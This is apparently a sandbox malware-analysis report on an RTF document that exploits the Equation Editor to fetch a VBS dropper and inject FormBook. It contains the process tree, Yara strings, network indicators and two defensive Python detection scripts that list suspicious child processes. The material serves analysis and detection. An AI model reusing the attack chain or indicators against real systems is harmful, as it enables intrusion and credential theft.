
Windows Analysis Report
eMJ2QgQF4u.rtf

Overview

General Information

Sample name: eMJ2QgQF4u.rtf (renamed because the original name is a hash value)
Original sample name: d805f910e1756735e34523281088f2ed.rtf
Analysis ID: 1520425
MD5: d805f910e1756735e34523281088f2ed
SHA1: 243f7b70a0fde02f3afd3b7d2fe99a786cb505db
SHA256: d43cc5a3d193c33295a70f6861ee2d0ddbeeb165ab106018f06a38cc5297eb57
Tags: rtf, VIPKeylogger, user-abuse_ch

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Suricata IDS alerts for network traffic
Yara detected FormBook
Allocates memory in foreign processes
Document exploit detected (process start blacklist hit)
Injects a PE file into a foreign processes
Installs new ROOT certificates
Machine Learning detection for dropped file
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Potential malicious VBS script found (has network functionality)
Sigma detected: Equation Editor Network Connection
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: WScript or CScript Dropper
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sigma detected: AspNetCompiler Execution
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w7x64
  • WINWORD.EXE (PID: 3260 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • EQNEDT32.EXE (PID: 3340 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
      • wscript.exe (PID: 3508 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethedifferentofpicture.vbs" MD5: 979D74799EA6C8B8167869A68DF5204A)
        • temp_executable.exe (PID: 3584 cmdline: "C:\Users\user\AppData\Local\Temp\temp_executable.exe" MD5: 3E01AC27E853080CA5C92470DF3F738C)
          • aspnet_compiler.exe (PID: 3664 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" MD5: A1CC6D0A95AA5C113FA52BEA08847010)
    • EQNEDT32.EXE (PID: 3756 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
  • cleanup
No configs have been found
Source: eMJ2QgQF4u.rtf
Rule: INDICATOR_RTF_MalVer_Objects
Description: Detects RTF documents with a non-standard version and embedding one of the objects mostly observed in exploit documents.
Author: ditekSHen
Strings:
  • 0x1fb4: $obj2: \objdata
  • 0x1fca: $obj3: \objupdate
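The INDICATOR_RTF_MalVer_Objects match above keys on two things: an RTF header that is not the spec's `{\rtf1`, and object control words such as `\objdata` and `\objupdate` that make Word hand an embedded OLE object to its server on open. The Python triage script below is an added example, not code from the Joe Sandbox report or from the ditekSHen rule. It reproduces that logic and goes one step further: it decodes the `\objdata` hex and parses the OLE 1.0 object header (MS-OLEDS ObjectHeader) so the embedded class name, for instance `Equation.3`, is visible without opening the document. Assumptions: the "standard header" check is this example's reading of the rule's "non-standard version" condition (exactly `{\rtf1`), and the sample RTF is constructed here with a harmless placeholder payload, not taken from the analysed file.

```python
import binascii
import re
import struct

# RTF control words that introduce an embedded object; the Yara rule keys on the first two.
OBJECT_KEYWORDS = (b"\\objdata", b"\\objupdate", b"\\objemb", b"\\objautlink")
HEX_DIGITS = b"0123456789abcdefABCDEF"


def header_is_standard(data: bytes) -> bool:
    """The RTF spec opens a file with '{\\rtf1'. Word also accepts truncated or
    altered headers ('{\\rt', '{\\rtf2', ...), which malicious documents use to
    dodge naive signatures, so anything other than the exact spec header is flagged."""
    return data.startswith(b"{\\rtf1")


def find_object_keywords(data: bytes):
    """Return (offset, keyword) pairs for every object control word, sorted by offset."""
    hits = []
    for kw in OBJECT_KEYWORDS:
        hits.extend((m.start(), kw.decode()) for m in re.finditer(re.escape(kw), data))
    return sorted(hits)


def extract_objdata_blobs(data: bytes):
    """Decode the hex payload of each \\objdata group. Word ignores whitespace and
    unknown control words inside the group, so only hex digits are kept; control
    words (and \\'hh escapes) are skipped so their letters are not read as hex."""
    blobs = []
    for m in re.finditer(rb"\\objdata\b", data):
        i, depth, hexchars = m.end(), 0, bytearray()
        while i < len(data):
            c = data[i:i + 1]
            if c == b"\\":                       # skip a control word / escape
                i += 1
                while i < len(data) and (data[i:i + 1].isalnum() or data[i:i + 1] == b"'"):
                    i += 1
                continue
            if c == b"{":
                depth += 1
            elif c == b"}":
                if depth == 0:                   # end of the \objdata group
                    break
                depth -= 1
            elif c in HEX_DIGITS:
                hexchars += c
            i += 1
        if len(hexchars) % 2:                    # tolerate a dangling nibble
            hexchars = hexchars[:-1]
        blobs.append(binascii.unhexlify(bytes(hexchars)))
    return blobs


def parse_ole1_header(blob: bytes):
    """Parse the OLE 1.0 ObjectHeader (MS-OLEDS 2.2.4): OLEVersion, FormatID,
    ClassName, TopicName, ItemName, then NativeDataSize for embedded objects
    (FormatID 2). Returns a dict, or None if the blob is not a well-formed header."""
    off = 0

    def u32():
        nonlocal off
        if off + 4 > len(blob):
            raise ValueError("truncated header")
        value = struct.unpack_from("<I", blob, off)[0]
        off += 4
        return value

    def lpstr():
        # LengthPrefixedAnsiString: u32 length (including the NUL), then the bytes.
        nonlocal off
        n = u32()
        if off + n > len(blob):
            raise ValueError("truncated string")
        s = blob[off:off + n]
        off += n
        return s.rstrip(b"\x00").decode("latin-1")

    try:
        version, fmt = u32(), u32()
        class_name, topic, item = lpstr(), lpstr(), lpstr()
        native_size = u32() if fmt == 2 else None
    except ValueError:
        return None
    return {"version": version, "format_id": fmt, "class_name": class_name,
            "topic": topic, "item": item, "native_data_size": native_size,
            "native_data_offset": off}


def triage_rtf(data: bytes):
    """Return a list of human-readable findings; an empty list means nothing suspicious."""
    findings = []
    if not data.startswith(b"{\\rt"):
        return ["not an RTF file (no '{\\rt' header)"]
    if not header_is_standard(data):
        findings.append(f"non-standard RTF header: {data[:8]!r}")
    for off, kw in find_object_keywords(data):
        findings.append(f"0x{off:x}: {kw}")
    for blob in extract_objdata_blobs(data):
        hdr = parse_ole1_header(blob)
        if hdr is None:
            findings.append(f"\\objdata blob of {len(blob)} bytes is not a parseable OLE1 header")
            continue
        findings.append(f"embedded OLE1 object: class {hdr['class_name']!r}, "
                        f"native data {hdr['native_data_size']} bytes")
        if "equation" in hdr["class_name"].lower():
            findings.append("Equation Editor object: check for CVE-2017-11882 / CVE-2018-0802")
    return findings


def build_ole1_blob(class_name: bytes, native: bytes) -> bytes:
    """Constructed fixture only: wrap `native` in an OLE1 embedded-object header."""
    def lp(s: bytes) -> bytes:
        return b"\x00" * 4 if not s else struct.pack("<I", len(s) + 1) + s + b"\x00"
    return (struct.pack("<II", 0x501, 2) + lp(class_name) + lp(b"") + lp(b"")
            + struct.pack("<I", len(native)) + native)


# Constructed sample: non-standard '{\rt1' header, \objupdate (activate the object
# on open) and an Equation.3 object whose native data is a harmless placeholder.
SAMPLE_RTF = (b"{\\rt1\\ansi\\deff0\n{\\object\\objemb\\objupdate\\objw400\\objh300\n"
              b"{\\*\\objdata "
              + binascii.hexlify(build_ole1_blob(b"Equation.3", b"CONSTRUCTED-NOT-AN-EXPLOIT"))
              + b"\n}}}")

if __name__ == "__main__":
    for line in triage_rtf(SAMPLE_RTF):
        print(line)
```

Point `triage_rtf` at the raw bytes of a suspect document; a class name containing "Equation" together with `\objupdate` is the combination that makes this sample's chain start without any user interaction beyond opening the file.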
Source: 00000007.00000002.383276481.0000000000400000.00000040.00000400.00020000.00000000.sdmp
  Rule: JoeSecurity_FormBook_1 | Description: Yara detected FormBook | Author: Joe Security
  Rule: Windows_Trojan_Formbook_1112e116 | Description: unknown | Author: unknown
    • 0x2ea43: $a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x16d42: $a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
Source: 00000007.00000002.383140999.0000000000100000.00000004.00001000.00020000.00000000.sdmp
  Rule: JoeSecurity_FormBook_1 | Description: Yara detected FormBook | Author: Joe Security
  Rule: Windows_Trojan_Formbook_1112e116 | Description: unknown | Author: unknown
    • 0x2b950: $a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x13c4f: $a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
Source: 7.2.aspnet_compiler.exe.400000.0.raw.unpack
  Rule: JoeSecurity_FormBook_1 | Description: Yara detected FormBook | Author: Joe Security
  Rule: Windows_Trojan_Formbook_1112e116 | Description: unknown | Author: unknown
    • 0x2ea43: $a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x16d42: $a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
Source: 7.2.aspnet_compiler.exe.400000.0.unpack
  Rule: JoeSecurity_FormBook_1 | Description: Yara detected FormBook | Author: Joe Security
  Rule: Windows_Trojan_Formbook_1112e116 | Description: unknown | Author: unknown
    • 0x2dc43: $a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x15f42: $a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

          Exploits

Source: Network Connection | Author: Joe Security | Data: DestinationIp: 185.235.137.223, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3340, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3340, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\seethedifferentofpicture[1].vbs

          System Summary

Source: Network Connection | Author: Max Altgelt (Nextron Systems) | Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49165, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3340, Protocol: tcp, SourceIp: 185.235.137.223, SourceIsIpv6: false, SourcePort: 80
Source: Process started | Author: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethedifferentofpicture.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethedifferentofpicture.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3340, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethedifferentofpicture.vbs" , ProcessId: 3508, ProcessName: wscript.exe
Source: Process started | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethedifferentofpicture.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethedifferentofpicture.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3340, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethedifferentofpicture.vbs" , ProcessId: 3508, ProcessName: wscript.exe
Source: Process started | Author: frack113 | Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\temp_executable.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\temp_executable.exe, ParentProcessId: 3584, ParentProcessName: temp_executable.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", ProcessId: 3664, ProcessName: aspnet_compiler.exe
Source: Process started | Author: Michael Haag | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethedifferentofpicture.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethedifferentofpicture.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3340, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethedifferentofpicture.vbs" , ProcessId: 3508, ProcessName: wscript.exe
Source: Registry Key set | Author: frack113 | Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3340, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
Source: File created | Author: Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 3260, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-09-27T10:57:07.632401+0200 | 2019696 | 1 | A Network Trojan was detected | 192.168.2.22 | 49166 | 185.18.213.20 | 443 | TCP
2024-09-27T10:57:07.632401+0200 | 2019714 | 2 | Potentially Bad Traffic | 192.168.2.22 | 49166 | 185.18.213.20 | 443 | TCP
2024-09-27T10:57:09.645046+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.22 | 49167 | 185.18.213.20 | 443 | TCP
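The process tree and the Sigma hits above describe one chain: WINWORD.EXE hands the OLE object to EQNEDT32.EXE, the Equation Editor fetches and runs a VBS through wscript.exe, the script drops temp_executable.exe under %TEMP%, and that dropper starts the signed .NET utility aspnet_compiler.exe with no arguments, which is where the FormBook Yara hits land. The Python below is an added example, not Joe Sandbox or Sigma code, that encodes those rules as functions over Sysmon-style process-creation (EventID 1) and network-connection (EventID 3) records. The events are constructed here to mirror the report's PIDs, images and command lines; the set of hollowing targets is a starter list chosen for the example, not an exhaustive one.

```python
# Parents whose children are scrutinised. EQNEDT32.EXE is included because Word
# hands the OLE object to it out of process, so the suspicious child hangs off
# the Equation Editor rather than off WINWORD.EXE (exactly as in the report).
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "eqnedt32.exe"}
SUSPICIOUS_CHILDREN = {"wscript.exe", "cscript.exe", "cmd.exe", "powershell.exe",
                       "mshta.exe", "regsvr32.exe", "rundll32.exe", "certutil.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
SCRIPT_EXT = (".vbs", ".vbe", ".js", ".jse", ".wsf")
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\users\\public\\", "\\programdata\\")
# Signed .NET utilities that loaders start suspended and overwrite; starter list (assumption).
HOLLOWING_TARGETS = {"aspnet_compiler.exe", "regasm.exe", "regsvcs.exe",
                     "msbuild.exe", "installutil.exe"}

WINWORD = r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE"
EQNEDT = r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"
WSCRIPT = r"C:\Windows\SysWOW64\wscript.exe"
TEMP_EXE = r"C:\Users\user\AppData\Local\Temp\temp_executable.exe"
ASPNET = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"

# Constructed events mirroring the PIDs and command lines in the report's process tree.
PROCESS_EVENTS = [
    {"pid": 3260, "ppid": 1000, "image": WINWORD, "cmd": f'"{WINWORD}" /Automation -Embedding'},
    {"pid": 3340, "ppid": 3260, "image": EQNEDT, "cmd": f'"{EQNEDT}" -Embedding'},
    {"pid": 3508, "ppid": 3340, "image": WSCRIPT,
     "cmd": r'"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethedifferentofpicture.vbs"'},
    {"pid": 3584, "ppid": 3508, "image": TEMP_EXE, "cmd": f'"{TEMP_EXE}"'},
    {"pid": 3664, "ppid": 3584, "image": ASPNET, "cmd": f'"{ASPNET}"'},
    {"pid": 3756, "ppid": 3260, "image": EQNEDT, "cmd": f'"{EQNEDT}" -Embedding'},
]
NETWORK_EVENTS = [
    {"pid": 3340, "image": EQNEDT, "dst_ip": "185.235.137.223", "dst_port": 80, "initiated": True},
]


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def in_user_writable(path: str) -> bool:
    return any(marker in path.lower() for marker in USER_WRITABLE)


def has_arguments(cmd: str, image: str) -> bool:
    """True unless the command line is nothing but the (optionally quoted) image path."""
    return cmd.strip().strip('"').lower() != image.lower()


def lineage(by_pid: dict, pid: int) -> list:
    """Walk ppid links back to the root and return image basenames root-first."""
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(basename(by_pid[pid]["image"]))
        pid = by_pid[pid]["ppid"]
    return chain[::-1]


def detect(process_events: list, network_events: list) -> list:
    """Return (severity, rule, pid, detail) tuples for every rule that fires."""
    by_pid = {e["pid"]: e for e in process_events}
    alerts = []
    for e in process_events:
        name = basename(e["image"])
        parent = by_pid.get(e["ppid"])
        pname = basename(parent["image"]) if parent else ""
        # Equation Editor has no business spawning anything; any child means code execution.
        if pname == "eqnedt32.exe":
            alerts.append(("high", "eqnedt32_child", e["pid"], f"Equation Editor spawned {name}"))
        # Office parent -> script host / LOLBin ("Suspicious Microsoft Office Child Process").
        if pname in OFFICE_PARENTS and name in SUSPICIOUS_CHILDREN:
            alerts.append(("high", "office_suspicious_child", e["pid"], f"{pname} -> {name}"))
        # Script host running a script from a user-writable directory.
        if name in SCRIPT_HOSTS:
            cmd = e["cmd"].lower()
            if cmd.rstrip('" ').endswith(SCRIPT_EXT) and in_user_writable(cmd):
                alerts.append(("medium", "script_host_user_path", e["pid"], e["cmd"]))
        # Script host launching an executable it just wrote ("WScript or CScript Dropper").
        if pname in SCRIPT_HOSTS and in_user_writable(e["image"]):
            alerts.append(("high", "script_host_dropper", e["pid"], f"{pname} started {e['image']}"))
        # Dropper in a user-writable path starting a signed .NET utility with no arguments:
        # the classic "start suspended, write payload, resume" hollowing pattern.
        if (name in HOLLOWING_TARGETS and parent and in_user_writable(parent["image"])
                and not has_arguments(e["cmd"], e["image"])):
            alerts.append(("high", "hollowing_candidate", e["pid"],
                           f"{pname} started {name} with no arguments"))
    for n in network_events:
        if basename(n["image"]) == "eqnedt32.exe" and n.get("initiated"):
            alerts.append(("high", "eqnedt32_network", n["pid"],
                           f"outbound {n['dst_ip']}:{n['dst_port']}"))
    return alerts


if __name__ == "__main__":
    by_pid = {e["pid"]: e for e in PROCESS_EVENTS}
    print(" -> ".join(lineage(by_pid, 3664)))
    for sev, rule, pid, detail in detect(PROCESS_EVENTS, NETWORK_EVENTS):
        print(f"[{sev}] {rule} pid={pid}: {detail}")
```

Word starting EQNEDT32.EXE on its own is not alerted: that happens for every legitimate equation, and the two Equation Editor instances in the tree (PIDs 3340 and 3756) are only interesting because one of them spawned wscript.exe and connected out. On a patched host (KB4011604 or later, or with the Equation Editor COM class disabled) the chain stops at the first rule, so `eqnedt32_child` alone is worth a high-severity alert.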


          AV Detection

Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | ReversingLabs: Detection: 21%
Source: eMJ2QgQF4u.rtf | ReversingLabs: Detection: 47%
Source: Yara match | File source: 7.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000007.00000002.383276481.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.383140999.0000000000100000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Joe Sandbox ML: detected

          Exploits

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Network connect: IP: 185.235.137.223 Port: 80
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Windows\SysWOW64\wscript.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Windows\SysWOW64\wscript.exe
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: unknown | HTTPS traffic detected: 185.18.213.20:443 -> 192.168.2.22:49166 version: TLS 1.2
Source: Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\DEMONCODER.pdb | source: temp_executable.exe, 00000006.00000002.378697765.00000000026BA000.00000004.00000800.00020000.00000000.sdmp, temp_executable.exe, 00000006.00000002.378311864.00000000002B0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: C:\Users\owner\Documents\CryptoObfuscator_Output\WHJHHGDJHJKSKAJD.pdbBSJB | source: wscript.exe, 00000005.00000003.378978935.000000000312F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.363758912.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.363766209.0000000003124000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.379207138.0000000003440000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.379086218.0000000002F11000.00000004.00000020.00020000.00000000.sdmp, temp_executable.exe, 00000006.00000000.364483377.0000000000A82000.00000020.00000001.01000000.00000007.sdmp, temp_executable.exe.5.dr
Source: Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\DEMONCODER.pdbBSJB | source: temp_executable.exe, 00000006.00000002.378697765.00000000026BA000.00000004.00000800.00020000.00000000.sdmp, temp_executable.exe, 00000006.00000002.378311864.00000000002B0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdb | source: aspnet_compiler.exe, aspnet_compiler.exe, 00000007.00000002.383393735.0000000000900000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: C:\Users\owner\Documents\CryptoObfuscator_Output\WHJHHGDJHJKSKAJD.pdb | source: wscript.exe, 00000005.00000003.378978935.000000000312F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.363758912.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.363766209.0000000003124000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.379207138.0000000003440000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.379086218.0000000002F11000.00000004.00000020.00020000.00000000.sdmp, temp_executable.exe, 00000006.00000000.364483377.0000000000A82000.00000020.00000001.01000000.00000007.sdmp, temp_executable.exe.5.dr

          Software Vulnerabilities

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Source: global traffic | DNS query: name: dl.zerotheme.ir
Source: global traffic | TCP traffic: 192.168.2.22:49165 <-> 185.235.137.223:80 (many packets in both directions; the EQNEDT32.EXE download of the VBS)
Source: global traffic | TCP traffic: 192.168.2.22:49166 -> 185.18.213.20:443 (many packets; TLS 1.2)
Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 185.18.213.20:443 (many packets)
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 185.18.213.20:443 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.18.213.20:443
